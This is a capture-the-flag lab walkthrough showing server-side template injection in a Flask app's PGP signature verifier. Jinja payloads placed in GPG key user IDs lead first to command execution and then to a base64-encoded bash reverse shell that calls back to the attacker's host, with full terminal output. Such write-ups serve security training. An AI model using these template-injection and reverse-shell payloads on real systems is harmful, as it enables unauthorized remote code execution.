SSTI
During the PGP testing earlier, I found out that the target web application pops open a new window to display the verification result for a signed message
I also noticed that the newly opened window displays the email address as part of the verification.
It might be entirely possible to inject a payload into that and have the web server execute it However, I need to first confirm and identify it although it’s likely using either Jinja as the template engine since the web app is built on Flask.
There are several testing payloads that I can try to invoke the web server to execute the mathematical operation
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
this is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
note: Use "gpg --full-generate-key" for a full featured key generation dialog.
GnuPG needs to construct a user ID to identify your key.
real name: {{7*7}}
email address: {{7*7}}@ssti.ssti
you selected this user-id:
"{{7*7}} <{{7*7}}@ssti.ssti>"
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/home/kali/.gnupg/openpgp-revocs.d/B178DF083B5FBA3FE1B3FEF5426FAA7DE84AD311.rev'
public and secret key created and signed.
pub rsa3072 2023-06-29 [sc] [expires: 2025-06-28]
B178DF083B5FBA3FE1B3FEF5426FAA7DE84AD311
uid {{7*7}} <{{7*7}}@ssti.ssti>
sub rsa3072 2023-06-29 [e] [expires: 2025-06-28]There are 2 fields that I can control; Real name and Email address
The window only showed the email address above because I previously generated the key pair using only the email
So I will test both fields as the Real name field could also be displayed alongside the Email address
Starting with the first payload; {{7*7}}
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --export --armor {{7*7}}@ssti.ssti
-----BEGIN PGP PUBLIC KEY BLOCK-----
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
3yzUgyLWhKpvL0LXpqHzQjNGLw==
=vwni
-----END PGP PUBLIC KEY BLOCK-----Exporting the public key to provide to the web app
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ echo "testing ssti" | gpg --armor -s -u {{7*7}}@ssti.ssti
-----BEGIN PGP MESSAGE-----
owEB7QES/pANAwAKAUJvqn3oStMRAcsTYgBknTr4dGVzdGluZyBzc3RpCokBxgQA
AQoAMBYhBLF43wg7X7o/4bP+9UJvqn3oStMRBQJknTr4Ehx7ezcqN319QHNzdGku
c3N0aQAKCRBCb6p96ErTERIrDACyYOhzpQ2OkEOTtE9S/okoE8id2VG3KsgCCZpU
woeAoHFrIB8I4g/cGNO05lqya2eBZjKflknemv8mL55677OD+9dVWoxq1+PIorXz
vShemunhMkvBDIOS6jNPWMnOKpdVOWH5SOAMLOYqMx+Jq1yfe0RQ4Oiyq/LnfS7O
1Da638BmSBh7QfiGqDyaeA8V9Nelp64GbHZBJslS69+gvIfeDn4fc0yVE/G7LDrT
tgiEDoJnCCQdYhjbt6+76NVkUO5XJqDkpfyeQhav+Wqt9+Rx5T+FDeR+d0QKmIQD
wZJh9F5Qt8oBM6GJPp5hVS0wo58zRJ0gu2Mlfi9iKEH/cJdUvh15UyVIciqXd8kO
jgqUTs96fbdx9exhFcXApKbJCc3jP8+Dhb2/1BCiXgxQz3TZLlw0rtFFTPJXaJWt
a2sqbxT3hB3T09a8NSJyqdoGaswDreCoxrkcjajSFll73d3H0myBFvm5uCjaTgZn
XqGmPbWiyC6mlQPp1jfFHjDC/6o=
=VI1T
-----END PGP MESSAGE-----Signing a message
Verifying..
SSTI confirmed in BOTH fields as the mathematical operation is executed
Now that I have confirmed that the target web application is vulnerable to SSTI, I will get to conde execution.
RCE
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --delete-secret-keys ssti
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
sec rsa3072/426FAA7DE84AD311 2023-06-29 {{7*7}} <{{7*7}}@ssti.ssti>
Delete this key from the keyring? (y/N) y
This is a secret key! - really delete? (y/N) y
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --delete-key ssti
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa3072/426FAA7DE84AD311 2023-06-29 {{7*7}} <{{7*7}}@ssti.ssti>
Delete this key from the keyring? (y/N) yI will first delete the key pair generated for testing as they are no longer needed
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Note: Use "gpg --full-generate-key" for a full featured key generation dialog.
GnuPG needs to construct a user ID to identify your key.
Real name: {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }}
Email address: ssti@ssti.ssti
You selected this USER-ID:
"{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }} <ssti@ssti.ssti>"
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/home/kali/.gnupg/openpgp-revocs.d/D0B35312CFCD0D090B9AB857880B1444B6046911.rev'
public and secret key created and signed.
pub rsa3072 2023-06-29 [SC] [expires: 2025-06-28]
D0B35312CFCD0D090B9AB857880B1444B6046911
uid {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }} <ssti@ssti.ssti>
sub rsa3072 2023-06-29 [E] [expires: 2025-06-28]Generating another key pair with the payload in the Real Name field
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }}
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --export --armor ssti@ssti.ssti
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGNBGSdPjIBDADSZOXmtZPF2kOBw+zOOzSZZhAz5YZu12BsOEBrv6cDh0hoEohb
OqPTwmt5+x04U1mC19B6o6AMWmBg9m5DmZbtVExz2JXbOLwY0rhTaHMW8l9/Yj2E
RF1q4H0Unm/GcRxxZ29VA5R8XYPDTkwXizmqN2KGmZNXXwjiIY82DLUkbJaP+01O
1oRdMDEx9ZKCC5b7VZq0JrY2MKwoe5jcghQ5d4p+Zj/SO4vEGSXRgtFlycNhreTd
Xze9f3uEnkv66I1sXQhHfNGlw2MTIatPvo5T+S0if/dneaVVnWK73c7/KTxvRNdN
2fQ4J6m5zCxS9LAzQs8LiD2fouudT8cFtnP5+2WMV3CJWOd7uYbPKWS6zRT4JYOO
DuYqImpMDTV84LTVLrMZ1AAjgDJQ3gHuDRH3BOLYgMLrKFzAiqw2Tz5D3uYuxOxf
WEzPcJQnkwqHwsYhEzxeSnrRmEsGwud9Y2gzPVGViwYd4IRh+PKKHuv8nwh1mEVy
+D2WIb8/cRlBl4cAEQEAAbR7e3sgY29uZmlnLl9fY2xhc3NfXy5mcm9tX2VudnZh
ci5fX2dsb2JhbHNfXy5fX2J1aWx0aW5zX18uX19pbXBvcnRfXygib3MiKS5wb3Bl
bigiaWQgOyBob3N0bmFtZSIpLnJlYWQoKSB9fSA8c3N0aUBzc3RpLnNzdGk+iQHU
BBMBCgA+FiEE0LNTEs/NDQkLmrhXiAsURLYEaREFAmSdPjICGwMFCQPCZwAFCwkI
BwIGFQoJCAsCBBYCAwECHgECF4AACgkQiAsURLYEaRFv8wv7ByiPT7qk0Y8OqPEp
O7ARxwKhbhCDkuDF2TBC0Fi+NP3R0PbC0n/lde9uKYTQ9YIB65QlDuQtvhfsb5ok
baulZfaIz0Gvi4W91If3hQMU17QcUOnX/6BaBOY1MCfoK17eOcyD29zGX/CLVcFS
hUNnOVmXdwntQUCjxIyOX5/w5rC5ubZbC0nGKhLc9zTp0xZQRkftZ+gl87Sm2vhu
4AO4j/iH5FEOQUUBwuYiNVf9y5pDzif9ZOCmwmOWozsPubDlm0gYlNYnxSXknjCi
n19LFGoCzObjLJ8JGswBYF2AmYt9wmNjys11INtUzAcp6T4TjEBwG3gxU8nKH0wi
j9QH4E8l7TcIynEtM33gknu8QMPTzcq6AxmS/m+vEudcrbJquiZQSYQdiOJ8ejyZ
iiRvIRsbaALuaa0YLmwA+MO9/Cr93CXynigxJJDtJ40CHzUpidMiL1ASoy0KxZZ3
CPaQf6A9LM6l+75dalvDbNWdXhvk+y48EfWmyTg0yJP3p1PvuQGNBGSdPjIBDAC5
rSfmg9eI8KPW0VhBGLxe53KmyMsaPGO6rDu7ZT9mNE6MLj9wi5J/KoXdwVmsDi+i
HsNCxCq//qdL2e7HBYxEUpFRySVhc2CY4wVZ4gEr3dNXd94hdkIrwa3zXnLVs80/
wQnamlPngehw0rJnfVQH4Nxb/SWUzlCy6zt2XauJHTCCSq+/7WwFUHUjvZwqN6fy
TrnAuG5LDHhzhLsfuuAckBCdf9erN4DqwLwmNTa/NtKb9GnKRu6Kzu65shodZeOz
fkuGSHIxnldzVXKVvr1Lj79zNF2QLmX1Z00bB/4QbYdZzRY9X6cjGOUzIx4qealk
EULNo3rG/TcuE80P5dvwZaROI5lpP9GkVxV1aVe86otLF/WmET36S44/IdeQMoao
RIWy8ittWNv0sccbuJsQKXhgeI767L9IR8wUSvvh3zooaYZiQeja8Swg3uThUDaG
WwDyaX1pvZbjJirMxak/Wei5Wq8lcYiG1zGnpgJ0rrXw4u7wd63UjmznFd6oPyEA
EQEAAYkBvAQYAQoAJhYhBNCzUxLPzQ0JC5q4V4gLFES2BGkRBQJknT4yAhsMBQkD
wmcAAAoJEIgLFES2BGkRzwML/RncLnk3v3HIQGCauq7dogimvA7tyBXPI+iK7sYn
B6IC+WT2RcAgBrH9UVffKGRwJFAFaJsf3QgTCAiDRPXKAtfbT51TCEirfdVLAgkq
25kVLZyviFeWH/95PLjgF++v0zlycuMGXmLWBCVd+uH+tY82Nlj4jyhdGgnA1Jd9
yQ75BcOi9e2Iql6y9haOxTgIP43fWfMH68HZWJZvVWxdnSRS8s3hfEu5hwd4iEQv
SKI2kcNjsLK1Edg4THmSEMWxE5NPLr0xcSfj/NIIN24i+JhFEH3JP0bWDBoemLdy
lVyQYhiJn+mVk1NEh3mki0AUd0kemIS5bAiReahFpM4lRF22j3gGPFUPf0B4cQ9l
hlvoo8nGv/6OAL7xfO/YRmAwyjAKnElRixAbzZyaVhM6PoImS4drxihUsfH3XEAx
8w142q6A1cPq/81gw2lBsnW6jhsL0vn4BtWYaqFRxdwmEoqtyzeDaKRNfmSgF3xE
tfkS1Gj+fUtEYL+GnMj9QS3Avg==
=eHfX
-----END PGP PUBLIC KEY BLOCK-----Exporting
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ echo "SSTI" | gpg --armor -s -u ssti@ssti.ssti
-----BEGIN PGP MESSAGE-----
owEB4gEd/pANAwAKAYgLFES2BGkRAcsLYgBknT5iU1NUSQqJAcMEAAEKAC0WIQTQ
s1MSz80NCQuauFeICxREtgRpEQUCZJ0+Yg8cc3N0aUBzc3RpLnNzdGkACgkQiAsU
RLYEaREplgv/aIl09U0F6zHcXGRIYPEFF47PTWaJ7DpUZ69yBK5aSBkeSess+n3j
d2aXuXTtIybCoj3ldPAjq75Pq8PNoco1VkmkffIe/pL5J0142NzSjjUUeZQBnSwQ
7qLwBKap41qfC+wLgggptTIhEQRyw6bf/tG2vaduccKMu2MBt3jxLEp1+DqS3RnQ
jsJND2hHgxeyzKjLPgDeurMffhjpCz5ngkfDVSTwopMOiHlpYJhtLx7MwvHalvhQ
+2cft/+r7ErV4Ty8BPZdiNSXrq0ByM8k8eLAeXPJINbRWmf/bR/i28fq6CVpWW/c
7jDFuFbCcrovboL3hZg9V/dluUPCueiXaoQ94as6vBzDWux/JRBa6M3kNuyae/D7
nVwsJdWKZ78HjuQCfemRlFmOddsQ0mYUY98p+GuMs5tfeaoTor3X4YxVjGBUtQZ6
te7tFQdEtRWCUWXB0zaOJsVXnWx2ZondI/I1cB6zLxH6j8hdvhSo7w+0uYOTLqcN
qU//n/ixmfgt
=RZ9v
-----END PGP MESSAGE-----Signing a message
So the web server is running with privileges of the atlas user
At this point, I can just spawn a reverse shell
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --delete-secret-keys ssti
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
sec rsa3072/880B1444B6046911 2023-06-29 {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }} <ssti@ssti.ssti>
Delete this key from the keyring? (y/N) y
This is a secret key! - really delete? (y/N) y
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --delete-key ssti
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa3072/880B1444B6046911 2023-06-29 {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }} <ssti@ssti.ssti>
Delete this key from the keyring? (y/N) yThe old key pair needs to be deleted again
Foothold
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
this is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
note: Use "gpg --full-generate-key" for a full featured key generation dialog.
GnuPG needs to construct a user ID to identify your key.
real name: {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Lzk5OTkgMD4mMQo=|base64 -d|bash'").read() }}
email address: ssti@ssti.ssti
you selected this user-id:
"{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Lzk5OTkgMD4mMQo=|base64 -d|bash'").read() }} <ssti@ssti.ssti>"
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/home/kali/.gnupg/openpgp-revocs.d/EF96965906B5BD3FF937D00CAFBA40A3F07D1963.rev'
public and secret key created and signed.
pub rsa3072 2023-06-29 [sc] [expires: 2025-06-28]
EF96965906B5BD3FF937D00CAFBA40A3F07D1963
uid {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Lzk5OTkgMD4mMQo=|base64 -d|bash'").read() }} <ssti@ssti.ssti>
sub rsa3072 2023-06-29 [e] [expires: 2025-06-28]Generating a key pair with the payload in the Real Name field
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Lzk5OTkgMD4mMQo=|base64 -d|bash'").read() }}
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --export --armor ssti@ssti.ssti
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGNBGSdRNcBDAC79pR3RqhFtAd52jH6aShbTIjcZEmmrDDCyCK16WgMB/tpHTTL
k3Wl2uKnmrH4xAB3BLbW6RJSXGOf9Dxr9+hRrD/kXujoQyTgtt5va6i72/vh21jN
uykA5Ps3E2gKMwdUnKLXtxwALOWZY4OSslIAnKnRiRoHUgGmUouJs95gLvnGKFM+
XBMs40TbkJoW8ngw7mSQzA/fHmWZtCF4OHrhIP7O6+WhrRa23tAZ7uXKV0KSToKK
Zuv+m3THS1+q2Fqb928rfPD/P2iba0DQE8gj4EM76pzY0TN3vX+qL/G8pd5A3Lhk
gwzmWFPOJskF7GoHlv7RdRWiXSEf2wEzhJXv/6sNUCgp4vs1BMGiaUfQjvwD5hqL
pmbdL9VoktwNAdAFCoc5r7xiSLjKt7sVYEcxGVXdkrNn0ysWgO5QYMAZva+65pOc
t+in8+bPNB863K3mNsCE1Voj6qmIalPV7ei5fM19p94cVgO9fHbcf8zgbKj76td2
AX/lx4J/UrlInCsAEQEAAbTIe3sgY29uZmlnLl9fY2xhc3NfXy5mcm9tX2VudnZh
ci5fX2dsb2JhbHNfXy5fX2J1aWx0aW5zX18uX19pbXBvcnRfXygib3MiKS5wb3Bl
bigiYmFzaCAtYyAnZWNobyBMMkpwYmk5emFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4
eE1DNHhNQzR4TkM0MEx6azVPVGtnTUQ0bU1Rbz18YmFzZTY0IC1kfGJhc2gnIiku
cmVhZCgpIH19IDxzc3RpQHNzdGkuc3N0aT6JAdQEEwEKAD4WIQTvlpZZBrW9P/k3
0AyvukCj8H0ZYwUCZJ1E1wIbAwUJA8JnAAULCQgHAgYVCgkICwIEFgIDAQIeAQIX
gAAKCRCvukCj8H0ZY6LNC/48JaC6rQUZwXgKKF7ZSWA+U/2jEj9ssWwcI4DlDQda
KwvwX/2xzDyWogx0LUkcAA8R4pEA7zx6RWphlsdX/jziwMno0c/8+5bmMvtJJv/l
fPFR9gAk0zMNMEwy20RCE0D7YEwyrDTmpHBPeD3RFZR5uwn9GeVgdXOGKShe+DeI
aNf5KwTYilv1+L9jXhN7UAgsgJ4NO/gTsuxnjdtLYf+BeqS2aXXy1LJ2bFvttTsC
3iUEs8omQcc5oP1cxAYchWFb+7uObM7fMSal37v0t+FdbFwnfVfw0rmI7U0AkYS6
6LrhDiuBrBVjwYjy7ZRUIsem7tMHFWtE3Tmw7egIBuZrpZMkjoOQSiwKBq5AyXEJ
KAx7EmpMkg4ynGC5AOggtr1BFbfg0XnWhSXoJQgBPRcAvhVnt9IiRM3XVnlArylv
5sfm9XFziyIBTT4Nlw/0ot5fiPFhX+i1j3FW7qjvDqlBuJdlAILCEparxZKdttoQ
+83nFpnKhAJQ8uKcgtmsEgq5AY0EZJ1E1wEMAMLDebhyHHyTa3zPn4bt29N7u74L
XtVXiHs8UYb9C4o1FpW2k5oIutgOsnYy/npcDyVYAKJrd0SvH7+cK5PXBZ82d5eO
0T38QXJqhDO1foDDItGd/JjJHxtWKYzAn3mAKaMLntc4MdbnlWAthiY6RUFuAU+L
FMrnODutNZtOuaLdmRbdEVAaobt/5HaqJ+hmGZSG3MYF/gCeOTSxE4Mj0Dr4+pOE
pFcm/j+VsIHnQWuLDeJBU8lra78kDuIxnljcfKZe+8nhYIc11rH/RTaujOiDuJ8m
ZeYXDGPRZAPcL0U1chBquIE+hchDI09RUR3LbYJfsNFGpX9sjHq5LexHnwiAS4mB
yXZN4KeJl5NBTzG9/7lRycXPYiP6bcn/buWnjyw1HwYarg1yjQxzvw/noeDJGhYC
KopVTlkIK2eLOXjVoxKRGDynVVO5770+CoBeQ6YYXFDzzM04ByAlKLbxt0cWKe49
bEqzo4MOmU6m1SB5IAgmvNIC0jytoHG10mXXvwARAQABiQG8BBgBCgAmFiEE75aW
WQa1vT/5N9AMr7pAo/B9GWMFAmSdRNcCGwwFCQPCZwAACgkQr7pAo/B9GWMMxwv/
R9XKFU2igFfsK5dPyPy1S+KjufbbVU9YYbxIQEfly8PAYDYgWnpz9LvsxSRehmSt
0hA0NNia+dCx9CYyF/nBFODRRw3qZQ9C4Ke4lCutVuJByUwZywBdwfWqzUcUE2H4
0IbRWBCLcY85idgNMKy8S6VGVrjERpBqPEQEhWrQO6eja5VZgBP/4/SSscN5fjoC
ZdawfFPKL+jLYodxz9UzshWzhrfTSUsBfXY2b42LG4fT39IoU+IvYmdc2Sr2i0qu
412RG3C76FYGiWcEmroyX9GJbPzZJgSS+/YJN7Yo04xim1gOE9XRbbyzgpYtpbVE
1hCn7uIfDKVojqdGl0NQCzMnQOTEdgRCeDTHQrvcUuF4oiJhr//gwaM+DKSe9w4f
FtSBTg6GTacnh5421jzOYhfGeVGIb8WgO5ywO1XUXFvYnyZPfROeJ397W9sEjWIh
kIP9BfbD1CmtsG2GOnBFXfBX3rOIjL2mq9pkoAJPc93wECOK4024PRFAlzZMwUzp
=voCp
-----END PGP PUBLIC KEY BLOCK-----
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ echo "SSTI" | gpg --armor -s -u ssti@ssti.ssti
-----BEGIN PGP MESSAGE-----
owEB4gEd/pANAwAKAa+6QKPwfRljAcsLYgBknUTrU1NUSQqJAcMEAAEKAC0WIQTv
lpZZBrW9P/k30AyvukCj8H0ZYwUCZJ1E6w8cc3N0aUBzc3RpLnNzdGkACgkQr7pA
o/B9GWO+UQv/RIgls6uOcN9OnzJm+Go5ijcYiozD0CnH77KEjFd5Vi9TqBdAPl8Q
3fg5w3GWxn5ayGP6Lywbk+hWVNcENIr29bCopQRyA1pW0R+afBV8PHAfJVc2Fa3m
8S/Nk9LP3ZoBc3QC9Hx+Su1aUOPTMJ4mKZ48yCntVwTc03NpZBAVKTFE1A7fPJ11
8KMR9R4iRayT1DZvMU3i7BCEk3MX9JwTzG7jBgDTKfdvd9Ux6xZuTj3wq/D8L32p
beZsWqqlWXZ7EWY/PMjiqXVvQIDAyQ5fuPtWW4q0IaU56ggOA7k0tiBfNBZ4VH3b
6gEozarpQ1CmzbcdawbiTLnJ7gXaStYqiwHi5ZNkefA7GgOL7ieWSHiAO5LJKEaU
6hJIXnsmOUPYQ9KkxM/MbQMBtO7kbqRB7Xx9xr33BV26lmP4fS5hU84Z09X8hM/T
jY3EdJrVBKXXSVhLSda0QjTz6UV7a3qCBGmeP9pTdMX0RKGGwiCUIgCPpoEtTrn/
xCGS+LDtkFcT
=+q+m
-----END PGP MESSAGE-----Export & sign a message
Sent
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.218] 52490
/bin/sh: 0: can't access tty; job control turned off
$ whoami
/bin/sh: 1: whoami: not found
$ id
uid=1000(atlas) gid=1000(atlas) groups=1000(atlas)
$ hostname
/bin/sh: 3: hostname: not found
$ ip a
/bin/sh: 4: ip: not found
$ ifconfig
/bin/sh: 5: ifconfig: not found
$ uname -r
/bin/sh: 6: uname: not found
$ ls
SSA
$ pwd
/var/www/html/SSAI got a shell session open, but it seems that I am in a restricted environment
Initial Foothold established to the target system as the atlas user via SSTI to RCE